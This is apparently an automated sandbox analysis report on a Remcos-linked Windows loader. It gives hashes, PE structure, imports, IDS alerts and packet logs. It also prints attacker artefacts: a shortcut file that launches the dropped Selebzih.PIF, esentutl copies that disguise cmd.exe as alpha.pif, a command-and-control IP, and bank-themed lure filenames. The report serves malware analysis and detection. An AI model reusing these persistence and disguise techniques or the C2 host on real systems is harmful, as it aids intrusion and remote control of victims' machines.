                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMC/MTsbxm5cPR:HRYFVmTWDyztMTExm+R
                                                                      MD5:6EE47F0C6F89FDC74EF14A6A1F994ABC
                                                                      SHA1:EC900C29BA156AE22322E142C395073B65AC8408
                                                                      SHA-256:EB5CFC90903A9C5952386847165EB0F35DB7355AB437D4584CFA6468863DB3D0
                                                                      SHA-512:2BD586BB5EFA6F51ED75FC0D7188ACC34512141D354CD0B6E2E83428506C9BAADAC97D3E794BB68227676FC75DA7CE1C0D3E0FD8539286A9A3986BD1A5EE093A
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Selebzih.PIF"..IconIndex=970139..HotKey=34..
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):236544
                                                                      Entropy (8bit):6.4416694948877025
                                                                      Encrypted:false
                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
• Filename: nft438A5fN.exe, Detection: malicious
• Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious
• Filename: IBKB.vbs, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: x.exe, Detection: malicious
• Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):589
                                                                      Entropy (8bit):4.65719623812716
                                                                      Encrypted:false
                                                                      SSDEEP:12:q6xTztMReSbZ7u0wxDDDDDDDDjCaY56aYAmVV4TB8NGNVG:rxTztMRp7u0wQak6ag/4t8ND
                                                                      MD5:35DC55A912DE411B7A2252EE84D2B0DF
                                                                      SHA1:C76CCD6F3B14D26260AA27D6E2491B9D932D5080
                                                                      SHA-256:E4478237DB114491BADBCF0DDB6F4D43FC711D8F84B6B9E8AC56E8F8590DBA55
                                                                      SHA-512:D83D1453762727330A595D6637148ACD209487BEA6384A19E4CD8E75A06D04470ED40A6885F42DE692092F2D431ED67AC65BF4F9003F1FDA6CBFC537C80FA180
                                                                      Malicious:false
Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\jlPBMMQbXC.exe...Destination File: C:\\Users\\Public\\Libraries\\Selebzih.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12fa00 (1243648) (1 MB)....Total bytes written = 0x130000 (1245184) (1 MB).......Operation completed successfully in 0.406 seconds.....
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):564
                                                                      Entropy (8bit):4.563144721515264
                                                                      Encrypted:false
                                                                      SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNc:/pLExT6cp7u0wQakn4al4t8N9
                                                                      MD5:5C3C5D404242B69461B6D20D2CBFC7A6
                                                                      SHA1:5BBC33F8FC5AF5C5C4F5A17F28345A1B7D07C68C
                                                                      SHA-256:F4D32853D80EBEC3AA0A13DA1C986D5371F49917ECDFF042EDFD36DDEA495DC4
                                                                      SHA-512:0D09E396C9FBF870EC33464BB4DAF23D0F9DDBF71D0B7C368E01A7998B903A3AD9EB8D5AA752682DAC5802993ADA871F185959D1F9B08AFAC966BB9C100C8775
                                                                      Malicious:false
Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 1.32 seconds.....
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.222099898338502
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      File name:jlPBMMQbXC.exe
                                                                      File size:1'243'648 bytes
                                                                      MD5:a27b6de588ad4d4c0d6e0c656e580f4e
                                                                      SHA1:48d25bbc2e65bd22678ca45d2b53b4ca8ce8059f
                                                                      SHA256:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561
                                                                      SHA512:c877cb2b51dbf234c5bca14f520d8bd42d8d5690e2f4f3d9ac07700e190fdbbbd4b52a6b0d1b71284f0b277f625d6b60f8f3b086ade1e7f7fc4347cf6af6e6df
                                                                      SSDEEP:24576:HZVgZqK0ycvp/WLq7frG1Pjc8sfe93uhoKg97y4zuaRacKHT7:Hri0HvELqW1PjKK3cg9XzuaReX
                                                                      TLSH:5C45F411E3B0F0F7D1B34539DF2A52E4693D6A2C2A1468772BA61A084F277907E3F15E
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                      Icon Hash:276ea3a6a6b7bfbf
                                                                      Entrypoint:0x471804
                                                                      Entrypoint Section:.itext
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:496d9ab5600002558fd60544a4b5b68f
                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00470754h
                                                                      call 00007F5EA191B031h
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F5EA196ACC5h
                                                                      mov ecx, dword ptr [0047D174h]
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [004703ECh]
                                                                      call 00007F5EA196ACC5h
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F5EA196AD39h
                                                                      call 00007F5EA1919098h
                                                                      lea eax, dword ptr [eax+00h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x82000          0x25f8        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8e000          0xaaa00       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x87000          0x6bbc        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x86000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x82700          0x5e8         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x6f98c       0x6fa00   6ab7774c8901a80d5c3dc88773ff88ff  False     0.5257340075587906   data       6.557205887281596   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext  0x71000          0x84c         0xa00     f1fc9ea2c6631acfba33944b9296cbdb  False     0.5296875            data       5.609468715893446   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0x72000          0xb3f0        0xb400    432aa6ccbb472918c8676a04fef565ce  False     0.098828125          data       2.0105427853738016  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss    0x7e000          0x36c4        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0x82000          0x25f8        0x2600    82fa8fedebb0af610ab0bbe44dc413f0  False     0.32308799342105265  data       5.163147043665758   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0x85000          0x34          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0x86000          0x18          0x200     a3a3e9881b8860e96ddaaa8c82231fe5  False     0.05078125           data       0.2108262677871819  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x87000          0x6bbc        0x6c00    f0fe8ed1efa35b6f13b7682be6eec721  False     0.6506438078703703   data       6.688109543909572   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc   0x8e000          0xaaa00       0xaaa00   947b43a4b2bd7b49f0224eb17baf1c46  False     0.6128934867216117   data       7.263650531299735   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x8ec28 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x8ed5c | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0x8ee90 | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x8efc4 | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0x8f0f8 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0x8f22c | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0x8f360 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_BITMAP | 0x8f494 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0x8f664 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125 |
| RT_BITMAP | 0x8f848 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0x8fa18 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414 |
| RT_BITMAP | 0x8fbe8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414 |
| RT_BITMAP | 0x8fdb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931 |
| RT_BITMAP | 0x8ff88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793 |
| RT_BITMAP | 0x90158 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0x90328 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896 |
| RT_BITMAP | 0x904f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0x906c8 | 0x99ce8 | Device independent bitmap graphic, 772 x 272 x 24, image size 629952, resolution 2835 x 2835 px/m | English | United States | 0.6101331445478673 |
| RT_BITMAP | 0x12a3b0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414 |
| RT_ICON | 0x12a498 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5610341151385928 |
| RT_ICON | 0x12b340 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.4191908713692946 |
| RT_ICON | 0x12d8e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4800656660412758 |
| RT_ICON | 0x12e990 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.6099290780141844 |
| RT_DIALOG | 0x12edf8 | 0x52 | data | | | 0.7682926829268293 |
| RT_DIALOG | 0x12ee4c | 0x52 | data | | | 0.7560975609756098 |
| RT_STRING | 0x12eea0 | 0x1cc | Targa image data - Color 99 x 107 x 32 +68 +111 "z" | | | 0.532608695652174 |
| RT_STRING | 0x12f06c | 0x1c8 | data | | | 0.5592105263157895 |
| RT_STRING | 0x12f234 | 0xcc | data | | | 0.6764705882352942 |
| RT_STRING | 0x12f300 | 0x114 | data | | | 0.6086956521739131 |
| RT_STRING | 0x12f414 | 0x350 | data | | | 0.43514150943396224 |
| RT_STRING | 0x12f764 | 0x3a4 | data | | | 0.38197424892703863 |
| RT_STRING | 0x12fb08 | 0x370 | data | | | 0.4022727272727273 |
| RT_STRING | 0x12fe78 | 0x3cc | data | | | 0.33539094650205764 |
| RT_STRING | 0x130244 | 0x214 | data | | | 0.49624060150375937 |
| RT_STRING | 0x130458 | 0xcc | data | | | 0.6274509803921569 |
| RT_STRING | 0x130524 | 0x194 | data | | | 0.5643564356435643 |
| RT_STRING | 0x1306b8 | 0x3c4 | data | | | 0.3288381742738589 |
| RT_STRING | 0x130a7c | 0x338 | data | | | 0.42961165048543687 |
| RT_STRING | 0x130db4 | 0x294 | data | | | 0.42424242424242425 |
| RT_RCDATA | 0x131048 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x131058 | 0x4ade | JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 320x256, components 3 | | | 0.993791088385683 |
| RT_RCDATA | 0x135b38 | 0x2ec | data | | | 0.7098930481283422 |
| RT_RCDATA | 0x135e24 | 0x21db | JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 387x191, components 3 | | | 0.9350409599630783 |
| RT_RCDATA | 0x138000 | 0x483 | Delphi compiled form 'Tfrm_about' | | | 0.535064935064935 |
| RT_GROUP_CURSOR | 0x138484 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x138498 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x1384ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1384c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1384d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1384e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1384fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x138510 | 0x3e | data | | | 0.8709677419354839 |
| RT_VERSION | 0x138550 | 0x378 | data | | | 0.46734234234234234 |
| DLL | Import |
|---|---|
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA |
| kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
| comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-26T08:12:05.411791+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49831 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:12:14.259973+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49723 | 13.107.136.10 | 443 | TCP |
| 2024-11-26T08:12:16.780726+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49729 | 13.107.136.10 | 443 | TCP |
| 2024-11-26T08:12:22.042356+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49746 | 162.19.139.102 | 443 | TCP |
| 2024-11-26T08:12:51.132303+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49763 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:13:14.034543+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49813 | 103.186.117.159 | 13939 | TCP |
| 2024-11-26T08:13:37.080639+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49823 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:13:59.329994+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49824 | 103.186.117.159 | 13939 | TCP |
| 2024-11-26T08:14:22.399426+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49825 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:14:45.018684+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49826 | 103.186.117.159 | 13939 | TCP |
| 2024-11-26T08:15:08.284779+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49827 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:15:30.463623+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49828 | 103.186.117.159 | 13939 | TCP |
| 2024-11-26T08:15:53.927407+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49829 | 103.186.117.159 | 56796 | TCP |
| 2024-11-26T08:16:16.567390+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49830 | 103.186.117.159 | 13939 | TCP |
                                                                      Nov 26, 2024 08:12:18.411803961 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411847115 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.411855936 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.411891937 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.420989990 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.420999050 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.421067953 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.421076059 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427692890 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427701950 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.427763939 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.427773952 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442537069 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442548037 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442573071 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442581892 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.442677021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.442677021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.442699909 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457612038 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457644939 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457705021 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.457715988 CET4434972913.107.136.10192.168.2.9
                                                                      Nov 26, 2024 08:12:18.457766056 CET49729443192.168.2.913.107.136.10
                                                                      Nov 26, 2024 08:12:18.471592903 CET4434972913.107.136.10192.168.2.9
